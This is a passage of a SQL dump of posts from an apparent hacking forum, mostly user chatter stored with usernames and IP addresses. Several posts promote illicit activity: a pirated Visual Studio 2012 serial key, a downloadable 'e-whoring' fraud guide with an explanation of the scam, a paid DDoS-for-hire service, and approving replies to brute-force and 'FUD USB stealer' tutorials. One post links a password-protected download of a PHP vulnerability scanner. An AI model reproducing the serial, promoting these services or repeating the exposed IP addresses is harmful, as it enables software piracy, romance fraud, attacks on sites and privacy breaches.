INTO mybb_posts VALUES('2434', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '1', 't3h jok3r', '1348274388', 'I survive on water to. I drink water everyday.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bf98d582b0911da8db8022e6efa19e33', '0', '0'); INSERT INTO mybb_posts VALUES('2435', '490', '2381', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1348274491', 'What exactly is minecraft?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '728f9d5b71f0650d275ecc2167cbc116', '0', '0'); INSERT INTO mybb_posts VALUES('2436', '466', '2201', '13', 'RE: How to BruteForce a VPS!', '0', '5', 'Timmy', '1348274761', 'No one liked my tutorial?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9b0222f60ce380de6b36f52578ed599b', '0', '0'); INSERT INTO mybb_posts VALUES('2437', '500', '0', '13', 'PHP vulnerability hunter', '0', '5', 'Timmy', '1348274873', '[size=large]PHP Vulnerability Hunter[/size]\n[size=medium]PHP Vulnerability Hunter is an advanced whitebox PHP web application fuzzer that scans for several different classes of vulnerabilities via static and dynamic analysis. By instrumenting application code, PHP Vulnerability Hunter is able to achieve greater code coverage and uncover more bugs.\n[/size]\n[size=large]Key Features[color=#FF0000][/color][/size]\n[color=#000000]Automated Input Mapping[/color]\n[color=#000000]While most web application fuzzers rely on the user to specify application inputs, PHP vulnerability hunter uses a combination of static and dynamic analysis to automatically map the target application. Because it works by instrumenting application, PHP Vulnerability Hunter can detected inputs that are not referenced in the forms of the rendered page.[/color]\n\n[size=medium]Several Scan Modes[/size]\n\nPHP Vulnerability Hunter is aware of many different types of vulnerabilities found in PHP applications, from the most common such as cross-site scripting and local file inclusion to the lesser known, such as user controlled function invocation and class instantiation.\n\n[color=#FF0000][size=medium]PHP Vulnerability Hunter can detect the following classes of vulnerabilities:[/size][/color]\n\n Arbitrary command execution\n Arbitrary file read/write/change/rename/delete\n Local file inclusion\n Arbitrary PHP execution\n SQL injection\n User controlled function invocatino\n User controlled class instantiation\n Reflected cross-site scripting (XSS)\n Open redirect\n Full path disclosure\n\n[size=medium]Code Coverage[/size]\nGet measurements of how much code was executed during a scan, broken down by scan plugin and page. Code coverage can be calculated at either the function level or the code block level.\nScan Phases\n\n [size=medium] Initialization Phase[/size]\nDuring this phase, interesting function calls within each code file are hooked, and if code coverage is enabled the code is annotated. Static analysis is performed on the code to detect inputs.\n [size=medium]Scan Phase[/size]\nThis is where the bugs are uncovered. PHP Vulnerability Hunter iterates through its different scan plugins and plugin modes, scanning every file within the targeted application. Each time a page is requested, dynamic analysis is performed to discover new inputs and bugs.\n [size=medium]Uninitialization[/size]\n Once the scan phase is complete, all of the application files are restored from backups made during the initialization phase.\n:thumbup1:\n[img]http://i45.tinypic.com/a0xem0.jpg[/img]\nVirustotal: [url=https://www.virustotal.com/file/33ac331ad6480e2fcfef65c21a071afc4376d037b20e6365b7a3dbf308492206/analysis/1345123735/]link[/url]\n[url=http://www.2shared.com/file/ZpGN69iE/phpv1.html]Download link[/url]\n\nPassword\n\n[quote]\nphpv1[/quote]\n\nDeveloped by yuly', '72.231.24.165', '1223104677', '1', '0', '5', '1348274919', '1', 'eaa5bfe7dec838eefbd6b9ce54fb4b6e', '0', '1348274919'); INSERT INTO mybb_posts VALUES('2438', '405', '1885', '29', 'RE: Adf.ly Mass Clicking Bot', '0', '5', 'Timmy', '1348274999', 'Thank you. I needed this but why is it infected?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ea904fad95573c86e1effa622d48fad2', '0', '0'); INSERT INTO mybb_posts VALUES('2439', '414', '1900', '29', 'RE: Maximize Profits Using Google Adsense', '0', '5', 'Timmy', '1348275035', 'Thanks a lot for the contribution. You are to0o0o0 active you should do post here and then you PM.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '897c8e096370ed82d51acb3bd1317a90', '0', '0'); INSERT INTO mybb_posts VALUES('2440', '376', '1738', '54', 'RE: ExpressVPN codes', '0', '5', 'Timmy', '1348275069', 'does expressvpn keep logs?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '49965c68a806ce70a16c242b42363367', '0', '0'); INSERT INTO mybb_posts VALUES('2441', '501', '0', '43', 'Visual Studio-Ultimate 2012 serial', '0', '5', 'Timmy', '1348275199', 'Visual Studio 2012 has been released and the most of us is looking for getting it for free.\r\n\r\nHow to get it for free?\r\nJust follow the mini tutorial below.\r\nBut if you have already installed the Visual Studio Ultimate 2012 in your machine ignore the #1 step and go at #2 step.\r\n\r\n#1 Step. Install Visual Studio Ultimate 2012\r\n-Download the web-installer of the VS Ultimate 2012.\r\n(If you want to see more visit the Download page.)\r\n-After you have download the web-installer just double-click it and start the proccess of installation.\r\n-Follow the steps,choose your options and then the setup will start downloading and installing the VS Ultimate, like the previews Visual Studios if you are not a begginer.\r\n-Check the second (#2) step to see how to activate and register your product.\r\n\r\n#2 Step. Register your Visual Studio Ultimate 2012\r\n-After the installation of the VS Ultimate has finished, find the \" HELP \" tab from toolbar on top and click it.\r\n-Then find and open the \" Register Product \" and insert the serial key that you will find bellow.\r\n\r\nSerial Key:\r\n\r\nRBCXF-CVBGR-382MK-DFHJ4-C69G8\r\n\r\nCredits: nitro_hitman', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '62aa450d082f3acbdfe6720ee19c2abe', '0', '0'); INSERT INTO mybb_posts VALUES('2442', '465', '2194', '11', 'RE: What is ewhoring', '0', '5', 'Timmy', '1348275387', 'You pretend to be a female and be a online whore by using other girls pics & videos and earn money.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '126a266558b8e8314ab69ef497ca4a80', '0', '0'); INSERT INTO mybb_posts VALUES('2443', '464', '2192', '12', 'RE: [TUT] FUD USB Stealer by Anonymous Hackers', '0', '9', 'p420', '1348275522', 'Awesome. Do anonymous have their own site?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '5484f6235520b895618a82cf6204dbca', '0', '0'); INSERT INTO mybb_posts VALUES('2444', '439', '2432', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348277273', '[quote=\'t3h jok3r\' pid=\'2432\' dateline=\'1348274288\']\r\n1. Where are the group requirements?\r\n2. Where are the userbar and the ficon images?\r\n[/quote]\r\n\r\nShould I just delete the thread instead? And like remake it after? Since I am very busy these days.. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bb1f2d4b2e06f1f93f9fae4ad5805d65', '0', '0'); INSERT INTO mybb_posts VALUES('2445', '446', '2058', '28', 'RE: This forum is dead..', '0', '1', 't3h jok3r', '1348277702', 'Thanks for the report timmy.', '72.231.24.165', '1223104677', '1', '0', '1', '1348277731', '1', 'c80c033d4a6346dcb5eb34495174c12d', '0', '1348277731'); INSERT INTO mybb_posts VALUES('2446', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348277961', 'Granted. But you got fired/demoted the next day. \n\n\nI wish I had 5000 posts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '99cb604971e37f22d92f465607557dfb', '0', '0'); INSERT INTO mybb_posts VALUES('2447', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '82', 'iTzIpod', '1348277992', 'But your body needs the nutrients the food gives you..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9ab85a80fcd89e72402f7b0f4ee9f1fe', '0', '0'); INSERT INTO mybb_posts VALUES('2448', '490', '2381', '49', 'RE: Forum Suggestion', '0', '82', 'iTzIpod', '1348278115', '-__- Google it t3h jok3r... \n\nOr, let me do it for you. [url=http://adf.ly/D461j] Click[/url]\n\nI Googled \"Minecraft\".\n\nIt\'s basically a game that allows you to mine, and craft.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4fcbf248c243da92d730c6f291faa18d', '0', '0'); INSERT INTO mybb_posts VALUES('2449', '414', '1900', '29', 'RE: Maximize Profits Using Google Adsense', '0', '82', 'iTzIpod', '1348278205', 'But I find that too much work @Timmy. And thanks. No problem.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b30389990422b4d3f89bc8b2418fb0f3', '0', '0'); INSERT INTO mybb_posts VALUES('2450', '466', '2201', '13', 'RE: How to BruteForce a VPS!', '0', '2', 'Apathy', '1348316227', 'Awesome tutorial thanks. :)', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', '95fd3fef0d8d318e9c2ba1e85e72b6d6', '0', '0'); INSERT INTO mybb_posts VALUES('2451', '464', '2192', '12', 'RE: [TUT] FUD USB Stealer by Anonymous Hackers', '0', '2', 'Apathy', '1348316289', 'Cool tut thanks. :)', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', '51daa42b378c1cc3aaf3667761df2f81', '0', '0'); INSERT INTO mybb_posts VALUES('2452', '490', '2381', '49', 'RE: Forum Suggestion', '0', '53', 'sirchamp', '1348325495', '[quote] It\'s basically a game that allows you to mine, and craft. [/quote]\nAhhh Now I now what minecraft means. \n:P', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '90ea271f9b7f45a9e7c86deb33ef2e10', '0', '0'); INSERT INTO mybb_posts VALUES('2453', '439', '2429', '58', 'RE: Unique - Recruitment', '0', '172', 'MistaCode', '1348327666', '[quote=\'iTzIpod\' pid=\'2429\' dateline=\'1348255150\']\r\n@MistaCode, you can leak/leech/release stuff in there (Programs, Proxies, Shells, VPNs, eBooks, etc).\r\n[/quote]\r\n\r\nWell I got alot of ebooks worth 2-100$, that would help it ? :D', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'e5d1a82dee8d330554c6ab722c734f7a', '0', '0'); INSERT INTO mybb_posts VALUES('2454', '490', '2381', '49', 'RE: Forum Suggestion', '0', '194', 'Slender Man', '1348328069', 'How do people not know what that is?....', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '993e5d5f7e127992fef198e69517c87b', '0', '0'); INSERT INTO mybb_posts VALUES('2455', '439', '2453', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348330738', '[quote=\'MistaCode\' pid=\'2453\' dateline=\'1348327666\']\r\n[quote=\'iTzIpod\' pid=\'2429\' dateline=\'1348255150\']\r\n@MistaCode, you can leak/leech/release stuff in there (Programs, Proxies, Shells, VPNs, eBooks, etc).\r\n[/quote]\r\n\r\nWell I got alot of ebooks worth 2-100$, that would help it ? :D\r\n[/quote]\r\n\r\nSure. Just making threads that can lead to discussion is basically \"contributing\" :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '842e2a1eca92c64789d64c0bf5a365bb', '0', '0'); INSERT INTO mybb_posts VALUES('2456', '439', '2455', '58', 'RE: Unique - Recruitment', '0', '172', 'MistaCode', '1348331121', '[quote=\'iTzIpod\' pid=\'2455\' dateline=\'1348330738\']\r\n[quote=\'MistaCode\' pid=\'2453\' dateline=\'1348327666\']\r\n[quote=\'iTzIpod\' pid=\'2429\' dateline=\'1348255150\']\r\n@MistaCode, you can leak/leech/release stuff in there (Programs, Proxies, Shells, VPNs, eBooks, etc).\r\n[/quote]\r\n\r\nWell I got alot of ebooks worth 2-100$, that would help it ? :D\r\n[/quote]\r\n\r\nSure. Just making threads that can lead to discussion is basically \"contributing\" :D\r\n[/quote]\r\n\r\nSo I am in or not ? ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'e7bf378ec73ee49439104e6bfd3fe69e', '0', '0'); INSERT INTO mybb_posts VALUES('2457', '439', '2456', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348331307', '[quote=\'MistaCode\' pid=\'2456\' dateline=\'1348331121\']\r\n[quote=\'iTzIpod\' pid=\'2455\' dateline=\'1348330738\']\r\n[quote=\'MistaCode\' pid=\'2453\' dateline=\'1348327666\']\r\n[quote=\'iTzIpod\' pid=\'2429\' dateline=\'1348255150\']\r\n@MistaCode, you can leak/leech/release stuff in there (Programs, Proxies, Shells, VPNs, eBooks, etc).\r\n[/quote]\r\n\r\nWell I got alot of ebooks worth 2-100$, that would help it ? :D\r\n[/quote]\r\n\r\nSure. Just making threads that can lead to discussion is basically \"contributing\" :D\r\n[/quote]\r\n\r\nSo I am in or not ? ;)\r\n[/quote]\r\nWhy not check? O_o Scroll down.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a886d0e553d207bd1dc1bff91550505e', '0', '0'); INSERT INTO mybb_posts VALUES('2458', '502', '0', '61', 'Ultimate E-Whoring guide', '0', '172', 'MistaCode', '1348332082', 'Well this is the one that Snow.Eskimo is selling, but I\'m releasing it for free !\n\nTo View: \n[url=http://adf.ly/DDBAr] Click[/url]\n\nTo Download :\n[url=http://adf.ly/DDBDR] Click[/url]\n\nPassword:\nl33thacking.net\n\nEnjoy.', '88.193.83.195', '1489064899', '0', '0', '82', '1348713360', '1', '0686f968d18f4e14da11934295502f15', '0', '1348713360'); INSERT INTO mybb_posts VALUES('2461', '493', '2430', '35', 'RE: My Ugly Gamer Userbars', '0', '61', 'NXK', '1348346674', '[quote=\'iTzIpod\' pid=\'2430\' dateline=\'1348255180\']\nWhen are you making the Usergroup though? :o\n[/quote]\nWhenever the joker has time.', '99.253.94.204', '1677549260', '1', '0', '61', '1348346687', '1', '225b728d8db95c44fd3514be5f0dc940', '0', '1348346687'); INSERT INTO mybb_posts VALUES('2460', '493', '2459', '35', 'RE: My Ugly Gamer Userbars', '0', '82', 'iTzIpod', '1348334604', '[quote=\'MistaCode\' pid=\'2459\' dateline=\'1348334465\']\r\nI simply love Mr. Carter\'s Design ;)\r\nHere\'s hes userbars:\r\nhttp://imgur.com/a/BCjPw\r\nIt includes the stars ;)\r\n[/quote]\r\n\r\nThat has nothing to do with my thread. :/ Did you rate it? No. You were just talking about his userbars :(', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ce562930a1b5a0d363956766e271e276', '0', '0'); INSERT INTO mybb_posts VALUES('2462', '490', '2381', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1348367835', 'Because I\'m not into gaming.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4e6860e3d8833d1981e313942b0efe2f', '0', '0'); INSERT INTO mybb_posts VALUES('2463', '477', '2325', '19', '[Junk]Jok3r is going..', '0', '1', 't3h jok3r', '1348367868', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('2464', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348407516', 'hmmm, something like this?\n\n[img]http://i.imgur.com/kTxUr.gif[/img]\n\nif you want the original icon I can fix it', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd7f581078dd77b12a53ef96642df7cc1', '0', '0'); INSERT INTO mybb_posts VALUES('2465', '503', '0', '3', 'Ridiculous Downtime and Awards', '0', '1', 't3h jok3r', '1348444173', 'We are sorry for the inconvenience. L33THacking was down for the whole day because the server was having some problems by my hosting. Now the server is up, I bought 3 more spare servers just in-case something happens. From now on L33THacking will never go down for a long time. \n\nLabrocca (AKA Omniscient) refused to update the myawards plugin, so I will myself try to correct all the errors in the plugin. The plugin should be back in 5 days or so.', '72.231.24.165', '1223104677', '1', '0', '1', '1348459397', '1', '16b29eeabca36a7b721f545b162cc9d4', '0', '1348459397'); INSERT INTO mybb_posts VALUES('2466', '487', '2354', '56', 'RE: Corrupt a wish', '0', '1', 't3h jok3r', '1348444834', 'Lol you can\'t get fired.\n\nI would ban you for spamming even if all your posts were legit :P\n\nI wish I had 1 million dollars.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f6128d17409bdf87308369992ee6205e', '0', '0'); INSERT INTO mybb_posts VALUES('2467', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348448008', 'Granted but market prices raised. You can now buy apples for 1 million dollars. Enjoy your apple :D\n\n\nI wish I was Admin :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b96a5fbe8126e4cf5ace2d8ccd951e50', '0', '0'); INSERT INTO mybb_posts VALUES('2468', '503', '2465', '3', 'RE: Ridiculous Downtime and Awards', '0', '82', 'iTzIpod', '1348448099', 'Oh. So that was why LH was down.. And for the Awards Plugin, once it comes back, will we be refunded all of our awards?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5e65507c27a1969142189ff5796a1813', '0', '0'); INSERT INTO mybb_posts VALUES('2469', '431', '2464', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348448232', '[quote=\'R?????zo?\' pid=\'2464\' dateline=\'1348407516\']\r\nhmmm, something like this?\r\n\r\n[img]http://i.imgur.com/kTxUr.gif[/img]\r\n\r\nif you want the original icon I can fix it\r\n[/quote]\r\n\r\n\r\nI don\'t dig the font. I\'m looking for something better to go well with the Userbar. And the icon is alright. Like a meh.\r\n\r\nI\'m not saying it\'s bad. I\'m just saying it\'s alright in my opinion..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '32d4395711345674ef87fc90b0e013c1', '0', '0'); INSERT INTO mybb_posts VALUES('2470', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '82', 'iTzIpod', '1348448304', 'Alright. I\'ll try to make more Userbars if I got the time.... This weekend, I spent 90% of it on homework. 3% CoD :( & 7% Partying.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c7b64f777973df1d507f98aed7cbb41e', '0', '0'); INSERT INTO mybb_posts VALUES('2471', '503', '2465', '3', 'RE: Ridiculous Downtime and Awards', '0', '61', 'NXK', '1348448392', 'I was thinking we were getting DDoS\'d\n\nGlad to see everything is back up.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '2f1c85ced9b474f40575735cdf0a7a2e', '0', '0'); INSERT INTO mybb_posts VALUES('2472', '398', '2339', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '82', 'iTzIpod', '1348448441', '[quote=\'sirchamp\' pid=\'2339\' dateline=\'1348068182\']\r\nProof please (Picture/Video).\r\n[/quote]\r\n\r\nI can provide a picture/video for proof. Just be patient because I need to get in contact with GRONGamer61.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a02124b8814668a94c4995d0354470fa', '0', '0'); INSERT INTO mybb_posts VALUES('2473', '503', '2465', '3', 'RE: Ridiculous Downtime and Awards', '0', '82', 'iTzIpod', '1348451709', 'I agree with NXK.\nt3h jok3r. Can you check if we have been DDoSed please? :/ \n\nI mean these \"problems\" you were talking about could\'ve been caused because of a DDoS Attack.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fb70dc1cdd2f6826467e171017bd0904', '0', '0'); INSERT INTO mybb_posts VALUES('2474', '503', '2473', '3', 'RE: Ridiculous Downtime and Awards', '0', '1', 't3h jok3r', '1348453029', '[quote=\'iTzIpod\' pid=\'2473\' dateline=\'1348451709\']\r\nI agree with NXK.\r\nt3h jok3r. Can you check if we have been DDoSed please? :/ \r\n\r\nI mean these \"problems\" you were talking about could\'ve been caused because of a DDoS Attack.\r\n[/quote]\r\n\r\nAs I said, it was a problem behalf of the hosting company. We don\'t really have haters at the moment. When it comes to the awards, yes all the awards would be given back to the users or maybe I would have to re-add them manually but if I do then not every single one would be given back. \r\n\r\nI was planning to get my new PC today but my luck is not with me and hopefully I can it by Wednesday. Til then please bear with me if any problems come up.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd8c32e3c985661ded1192f2b2a60d08f', '0', '0'); INSERT INTO mybb_posts VALUES('2475', '398', '2472', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '1', 't3h jok3r', '1348453097', '[quote=\'iTzIpod\' pid=\'2472\' dateline=\'1348448441\']\r\n[quote=\'sirchamp\' pid=\'2339\' dateline=\'1348068182\']\r\nProof please (Picture/Video).\r\n[/quote]\r\n\r\nI can provide a picture/video for proof. Just be patient because I need to get in contact with GRONGamer61.\r\n[/quote]\r\n\r\nUmm, doesn\'t GRONgamer61 have to update the thread with his proof of DDoS?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '85c6c1960e1577c985d0838b2869bbbc', '0', '0'); INSERT INTO mybb_posts VALUES('2476', '493', '2461', '35', 'RE: My Ugly Gamer Userbars', '0', '1', 't3h jok3r', '1348453162', '[quote=\'NXK\' pid=\'2461\' dateline=\'1348346674\']\r\n[quote=\'iTzIpod\' pid=\'2430\' dateline=\'1348255180\']\r\nWhen are you making the Usergroup though? :o\r\n[/quote]\r\nWhenever the joker has time.\r\n[/quote]\r\n\r\nOh, I was waiting for your confirmation and the details including userbar lol. Send me the info.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '22a8834e01e5afe3b08341bd407c60ab', '0', '0'); INSERT INTO mybb_posts VALUES('2477', '345', '2273', '63', 'RE: Need userbar! [Gamers]', '0', '1', 't3h jok3r', '1348453316', '[quote=\'iTzIpod\' pid=\'2273\' dateline=\'1347935566\']\r\n[quote=\'NXK\' pid=\'2267\' dateline=\'1347935261\']\r\n[quote=\'iTzIpod\' pid=\'2240\' dateline=\'1347910842\']\r\nWill try this out now.\r\n\r\nMight take a while since I have loads of homework to do.\r\n[hr]\r\nEDIT: Sorry, but these are very bad..\r\nI had to finish up my homework..\r\nTruly sorry.\r\nHere you go\r\nMade a few.\r\nNOTE: Some of them, I messed up on. So.. yeah..\r\n[img]http://i.imgur.com/6IrpX.png[/img]\r\n[img]http://i.imgur.com/TA6YN.png[/img]\r\n[IMG]http://i.imgur.com/X7sfo.png[/IMG]\r\n[IMG]http://i.imgur.com/6Qoo4.png[/IMG]\r\n[img]http://i.imgur.com/iLWJi.png[/img]\r\n[IMG]http://i.imgur.com/r6WJM.png[/IMG]\r\n[IMG]http://i.imgur.com/hvGIF.png[/IMG]\r\n[IMG]http://i.imgur.com/ordbC.png[/IMG]\r\n[IMG]http://i.imgur.com/sNucP.png[/IMG]\r\n[IMG]http://i.imgur.com/CWKlk.png[/IMG]\r\n[IMG]http://i.imgur.com/jXBZk.png[/IMG]\r\n[IMG]http://i.imgur.com/0pJoK.png[/IMG]\r\n@NXK, sorry :/\r\n[/quote]\r\n\r\nTHIS IS WHY I LOVE YOU\r\n\r\nEvery single one of those are amazing man. Deffinatly going to be picking one of these.\r\n[/quote]\r\n\r\nYou\'re kidding.\r\nReloadzor has better GFX Talent then me. You gotta admit. Animated GFX Userbars are sexy. I would make one, but I don\'t know how. Plus, I rushed these.\r\n[/quote]\r\n\r\nHe isn\'t, they remind him of old school gaming that\'s why he will be picking one of them.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '344b1e2e31e3a5653b73f1798c0fa169', '0', '0'); INSERT INTO mybb_posts VALUES('2478', '431', '2469', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '1', 't3h jok3r', '1348453351', '[quote=\'iTzIpod\' pid=\'2469\' dateline=\'1348448232\']\r\n[quote=\'R?????zo?\' pid=\'2464\' dateline=\'1348407516\']\r\nhmmm, something like this?\r\n\r\n[img]http://i.imgur.com/kTxUr.gif[/img]\r\n\r\nif you want the original icon I can fix it\r\n[/quote]\r\n\r\n\r\nI don\'t dig the font. I\'m looking for something better to go well with the Userbar. And the icon is alright. Like a meh.\r\n\r\nI\'m not saying it\'s bad. I\'m just saying it\'s alright in my opinion..\r\n[/quote]\r\n\r\nI actually find the userbar good :)\r\nIt\'s just the font that needs a little change.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '94776b203369127284854f428a4711ec', '0', '0'); INSERT INTO mybb_posts VALUES('2479', '398', '2475', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '82', 'iTzIpod', '1348454032', '[quote=\'t3h jok3r\' pid=\'2475\' dateline=\'1348453097\']\r\n[quote=\'iTzIpod\' pid=\'2472\' dateline=\'1348448441\']\r\n[quote=\'sirchamp\' pid=\'2339\' dateline=\'1348068182\']\r\nProof please (Picture/Video).\r\n[/quote]\r\n\r\nI can provide a picture/video for proof. Just be patient because I need to get in contact with GRONGamer61.\r\n[/quote]\r\n\r\nUmm, doesn\'t GRONgamer61 have to update the thread with his proof of DDoS?\r\n[/quote]\r\n\r\nDidn\'t you request a vouch copy? Did you get it yet? O_o. I received mine and posted my vouch. But I have no proof for now..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '102ef5676206b55197fc7cb15b3663a0', '0', '0'); INSERT INTO mybb_posts VALUES('2480', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348454639', 'Forgot to mention about the font color. I don\'t really like it. I would appreciate if you made a couple userbars (animated) with a different font color, font, and icon. But I\'m sorry for being so picky. I know you\'re busy and all...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1682d1e6cfceb3859397a55d437e38d2', '0', '0'); INSERT INTO mybb_posts VALUES('2481', '398', '2479', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '1', 't3h jok3r', '1348455534', '[quote=\'iTzIpod\' pid=\'2479\' dateline=\'1348454032\']\r\n[quote=\'t3h jok3r\' pid=\'2475\' dateline=\'1348453097\']\r\n[quote=\'iTzIpod\' pid=\'2472\' dateline=\'1348448441\']\r\n[quote=\'sirchamp\' pid=\'2339\' dateline=\'1348068182\']\r\nProof please (Picture/Video).\r\n[/quote]\r\n\r\nI can provide a picture/video for proof. Just be patient because I need to get in contact with GRONGamer61.\r\n[/quote]\r\n\r\nUmm, doesn\'t GRONgamer61 have to update the thread with his proof of DDoS?\r\n[/quote]\r\n\r\nDidn\'t you request a vouch copy? Did you get it yet? O_o. I received mine and posted my vouch. But I have no proof for now..\r\n[/quote]\r\n\r\nHe didn\'t tell me when he was going to DDoS the site so I don\'t know if he really took down the site or not, in other words I didn\'t receive my vouch copy.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd7909d28d526a227e72355030e797253', '0', '0'); INSERT INTO mybb_posts VALUES('2482', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1348455583', 'GRONgamer61', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4cb78f7af9075fc83528ecd30671c474', '0', '0'); INSERT INTO mybb_posts VALUES('2483', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1348455606', '21. Go go go go UP :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'be844a6419dff9975c516757dd98b33d', '0', '0'); INSERT INTO mybb_posts VALUES('2484', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '1', 't3h jok3r', '1348455631', 'I agree and today I went through a huge loss because LH was down.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c50e2c1543e7d75e76e9a6b616d23977', '0', '0'); INSERT INTO mybb_posts VALUES('2485', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1348455657', '/me laughs at itzipod for being a copy cat.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '472d356fd53b58c4825a2c96654e5611', '0', '0'); INSERT INTO mybb_posts VALUES('2486', '238', '1021', '56', 'RE: Ban the user above you', '0', '1', 't3h jok3r', '1348455671', 'Banned for being a spammer ;)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5df5f63fe1094fe06d952eba54743d9f', '0', '0'); INSERT INTO mybb_posts VALUES('2487', '486', '2353', '56', 'RE: Guess how many?', '0', '1', 't3h jok3r', '1348455685', 'Damn, Lol I didn\'t think of that much.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '72fe392f1aa5e67b01b2e8a20bdb65b5', '0', '0'); INSERT INTO mybb_posts VALUES('2488', '487', '2354', '56', 'RE: Corrupt a wish', '0', '1', 't3h jok3r', '1348455736', 'Then you destroy the whole website by making a small mistake.\n\nI wish I get my new PC before wednesday.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3bb80e1f8f69e180b72153b774392956', '0', '0'); INSERT INTO mybb_posts VALUES('2489', '484', '2345', '4', 'RE: Slender Man here.', '0', '5', 'Timmy', '1348455821', 'Welcome to L33THacking bro', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '75a5350791c2a18bc984bc13a066b714', '0', '0'); INSERT INTO mybb_posts VALUES('2490', '503', '2465', '3', 'RE: Ridiculous Downtime and Awards', '0', '5', 'Timmy', '1348455853', 'Awesome cant wait for the awards plugin to be back.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '836bbd24923539a275fc29e25ae9f7b8', '0', '0'); INSERT INTO mybb_posts VALUES('2491', '486', '2353', '56', 'RE: Guess how many?', '0', '5', 'Timmy', '1348455909', 'I thought they were 21 but too off.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9cc56d48171fa45686fbf1e5efda462a', '0', '0'); INSERT INTO mybb_posts VALUES('2531', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '61', 'NXK', '1348497554', 'Size: Signature \r\nColour Scheme: Any \r\nRender/Image: Aby thing you\'d like\r\nText: NXk\r\nAnything else: I just want a signature, I\'m not good at making them so if you could help me out that would be nice. I don\'t mind what it looks like you can choose and do whatever you\'d like.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', 'a51787e8bef385cf34166c5d6b72ca13', '0', '0'); INSERT INTO mybb_posts VALUES('2532', '484', '2345', '4', 'RE: Slender Man here.', '0', '61', 'NXK', '1348497659', 'Welcome sir, I hope you stay active and HQ here! Aslong as you follow the rules everything should be just fine for you here.\r\n\r\nEnjoy!', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '0797b12de6513cda3955187d9043dd4f', '0', '0'); 